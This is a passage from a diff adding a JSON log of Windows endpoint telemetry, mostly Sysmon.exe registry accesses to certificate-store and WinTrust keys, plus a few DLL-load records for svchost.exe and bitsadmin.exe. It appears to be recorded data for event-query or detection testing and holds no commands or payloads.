"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "es.dll", + "image_path": "C:\\Windows\\System32\\es.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "BitsProxy.dll", + "image_path": "C:\\Windows\\System32\\BitsProxy.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "image_load", + "image_name": "BitsProxy.dll", + "image_path": "C:\\Windows\\System32\\BitsProxy.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", + "registry_value": "Connections", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903560016, + "unique_pid": 